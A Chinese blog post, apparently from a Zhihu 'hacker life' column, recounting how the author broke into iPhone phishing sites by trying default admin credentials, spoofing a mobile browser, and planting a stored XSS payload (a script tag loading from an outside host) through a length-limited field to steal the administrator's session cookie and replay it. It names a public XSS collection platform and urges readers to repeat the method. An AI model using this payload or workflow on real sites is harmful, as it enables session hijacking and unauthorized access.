故事说完了,还是要写技术。
偷了我的iphone,开路虎给我送回来。 - 黑客生活 - 知乎专栏
这个文章结尾我说了一句,免费找手机。结果.......
被偷的并收到短信的还真不少,我他妈怎么遇不上这种好事儿。
没办法,自己装的逼,跪着也要装完。
开始:
公众号小伙伴发来的”他收到的钓鱼站” (这是其中一种)
我靠,还不准进。也许是习惯,也许是手贱。试试admin、admin。于是....
猜测他这个限制是字节不够。进来以后,我开开心心的点击下一步就进入到了密保填写页面。
还没来得及截图,开开心心的创建XSS
我勒个去,你们猜发生了什么,我,他,妈,还,没,来,得,及,截,图
就这样无情的跳转了(等于关闭站点)。 好吧,我服,可能是在尝试登录的过程中,钓鱼团伙发现了有人在随便输入。于是猜测有人在尝试渗透。于是就........
搜集资料去,居然还是QQ邮箱, 加了QQ好友发现是个几乎没人用的号。
这哥们的QQ资料真是醉醉哒。
通过邮箱whois反差,得到以上域名~然并卵,全都无法访问。好吧,这是个失败的例子 不要方,下面还有成功的↓
知乎某女迷妹发来的链接
小样,还敢不让我用pc访问(其实钓鱼团伙这样设计这样也是为了防止大家发现钓鱼网站的域名有问题)
安装上图中的插件并启用,模拟访问苹果手机,访问成功以后的界面是这样的↓
这一次 我机智的使用了876585551, 而不是123等等来测试。担心又被察觉。
这一次,我先把图给截了,高潮的时候到了。
上图中有几个输入框,这里我们去XSS平台创建项目,并把xss payload(攻击代码)从这里插入。XSS平台: http:// xss.sssie.com
但我又机智的等了一下,先看看有没有什么限制之类的,万一插不进?
可能到了这里有人要问:为什么前面输入账号密码或者手机号的时候不插?
因为源代码中限制了输入的长度,不够我们输入攻击代码。当然,限制也分许多种,比如前端长度限制等等,以前写过关于长度限制的绕过,但是地址你们没有邀请码访问不进去。直接发图给大家 (图片是以前我们在成功渗透时时彩网站时对XSS长度限制讲解的一部分)
而这里的长度限制我没有仔细研究,也不想去麻烦。所以一直等到输入密保问题这个地方再看看。
你看下图↓
最大长度是32个字节。(空格、字母、符号都算在其中)
一般的payload(攻击代码)确实不会超出这个长度。
但我们还需要注意,万一又出现一个防御: 可能会过滤尖括号等
这里就懒得去讲解怎么绕过了,就是转义转码等等技巧。
请百度:搜狐视频储存型XSS(过滤了尖括号/圆括号/单引号等字符下的利用技巧)
这里我没有这个防御,所以我的攻击代码就很简单。 <script src=http://xxxxx.cn/RciB7cG></script>插入后提交,就坐等邮件的到来。管理员登录后台的时候应该就会发送他登录时生成的cookie (此时邮件没来,然而我想一次写完)
去邮箱找了一封十几分钟前XSS平台给我发的邮件
内容包括:网站后台登录地址、管理员登录生成的cookies。
这个时候通过浏览器插件 cookie hack 修改自己的cookie
恩,大致内容就这样吧。毕竟很多粉丝是小白,我只能讲一些最基本的东西。
很多原理没有一一解释,很多难关我也没提到,因为我讲了,而你遇到了。也无法搞定。
所以如果你遇到苹果钓鱼网站的时候,按照我这个思路走一遍,看看能不能搞定,不能搞定再来私信我。互相交流~
全文完,求打赏夜宵
最后,这个月应该还会出一篇针对XSS的五千字讲解。
相关系列:
你真的会SQL注入攻击吗?(下) - 黑客生活 - 知乎专栏
渗透测试,你真的会收集信息吗? - 黑客生活 - 知乎专栏
希望大家能学习真正的知识~
